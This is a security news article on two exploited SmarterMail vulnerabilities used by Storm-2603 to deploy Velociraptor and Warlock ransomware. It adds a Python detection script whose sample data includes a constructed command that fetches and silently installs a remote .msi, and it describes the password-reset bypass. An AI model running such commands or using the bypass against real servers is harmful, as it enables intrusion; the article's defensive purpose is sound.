Ransomware groups are actively exploiting two recently patched SmarterTools SmarterMail vulnerabilities that can lead to unauthenticated remote code execution (RCE).

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one of the critical flaws, tracked as CVE-2026-24423, to its Known Exploited Vulnerabilities catalog on Thursday, flagging it as being actively exploited in ransomware campaigns.

CVE-2026-24423, which was patched on Jan. 23, 2026, allows attackers to abuse SmarterMail's ConnectToHub API to deliver a malicious OS command from a remote server, achieving unauthenticated RCE.

The other critical flaw, tracked as CVE-2026-23760, enables authentication bypass via the password reset API. The force-reset-password endpoint fails to verify that the supplied old password is correct, allowing anyone to reset a password by supplying just a username. This could be exploited to reset administrator passwords and gain full control over a vulnerable SmarterMail instance.
According to ReliaQuest, SmarterMail's Volume Mount feature lets administrators supply commands for mounting network drives, but it accepts arbitrary commands because the administrator role is trusted. After using the password reset flaw to gain admin access, Storm-2603 used this feature to execute malicious commands and install the forensic tool Velociraptor, which it uses as a backdoor.

Velociraptor is legitimate open-source endpoint monitoring, digital forensics and incident response software that Storm-2603 has been known to abuse for command-and-control (C2) communications and for staging Warlock ransomware.

In the attack that used SmarterMail for initial access, the group used the SmarterMail process MailService.exe to spawn a command shell and ultimately trigger the Windows Installer to install a payload called v4.msi hosted on the legitimate cloud platform Supabase. ReliaQuest noted that Storm-2603 previously hosted payloads on GitHub; the shift to Supabase likely aids evasion because of the platform's trusted reputation. The v4.msi payload installs Velociraptor, which is then configured to connect to the attacker's C2 server. The use of legitimate forensics software also lowers the chance of detection, and in Storm-2603 attacks it typically precedes Warlock ransomware deployment.

ReliaQuest said it also observed suspicious ConnectToHub API calls on the affected SmarterMail server, indicating likely scanning for susceptibility to CVE-2026-24423. However, these calls came from infrastructure separate from that used by Storm-2603 and may have originated from a different threat actor.

The researchers noted that both vulnerabilities offer a path to RCE, and that finding artifacts of both on the same instance highlights the urgent need to patch both flaws. Both are resolved by upgrading to SmarterMail Build 9511.
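The process chain described above (MailService.exe spawning a shell that runs the Windows Installer against a remote .msi) is the kind of thing to hunt for in process-creation telemetry. The following is an added example, not ReliaQuest's detection logic: it walks Sysmon-style process records looking for cmd.exe, powershell.exe or msiexec.exe with MailService.exe as an ancestor, and raises the severity when the command line invokes msiexec with a URL source. The sample records, PIDs, paths and the Supabase-style URL are constructed.

```python
"""Hunt for MailService.exe -> shell -> msiexec chains in process-creation
records. Added illustrative example; the events below are constructed and
the logic is not ReliaQuest's or SmarterTools'."""
import ntpath
from dataclasses import dataclass
from typing import Dict, List

SMARTERMAIL_PROC = "mailservice.exe"
WATCHED_CHILDREN = {"cmd.exe", "powershell.exe", "msiexec.exe"}
MAX_DEPTH = 5  # how far up the parent chain to look


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str


# Constructed sample telemetry (hypothetical paths, PIDs and hostname).
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 400,
              r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe",
              "MailService.exe"),
    # Benign-looking volume mount via the feature the article describes
    ProcEvent(1200, 1000, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c net use Z: \\fileserver\share"),
    # Shell that pulls an installer from a remote URL
    ProcEvent(1300, 1000, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /i https://example.supabase.co/storage/v1/object/public/v4.msi /qn"),
    ProcEvent(1400, 1300, r"C:\Windows\System32\msiexec.exe",
              "msiexec /i https://example.supabase.co/storage/v1/object/public/v4.msi /qn"),
    # Unrelated installer run by some other parent: should not fire
    ProcEvent(1500, 600, r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Temp\vendor-update.msi /qn"),
]


def image_name(path: str) -> str:
    """Lower-cased file name; ntpath handles Windows paths on any host."""
    return ntpath.basename(path).lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain of ev, nearest first, bounded by MAX_DEPTH."""
    chain, cur = [], ev
    for _ in range(MAX_DEPTH):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain


def hunt(events: List[ProcEvent]) -> Dict[int, str]:
    """Return {pid: severity} for watched children descended from MailService.exe.

    'high'   : command line runs msiexec against a URL source
    'medium' : any shell/installer under MailService.exe (review the Volume Mount use)
    """
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, str] = {}
    for ev in events:
        if image_name(ev.image) not in WATCHED_CHILDREN:
            continue
        if not any(image_name(a.image) == SMARTERMAIL_PROC
                   for a in ancestors(ev, by_pid)):
            continue
        cl = ev.cmdline.lower()
        remote_installer = "msiexec" in cl and "://" in cl
        findings[ev.pid] = "high" if remote_installer else "medium"
    return findings


if __name__ == "__main__":
    for pid, sev in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"pid {pid}: {sev}")
```

Feed it real Sysmon Event ID 1 or Windows 4688 records (mapping ProcessId, ParentProcessId, Image and CommandLine onto `ProcEvent`), and treat a "medium" hit as a prompt to confirm the Volume Mount command was an administrator's own.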
ReliaQuest also recommends isolation of the mail server from the rest of the internal network and restriction of outbound mail server traffic to only necessary email protocols.
Ransomware, Vulnerability Management, Patch/Configuration Management, Email security
SmarterMail vulnerabilities exploited in ransomware campaigns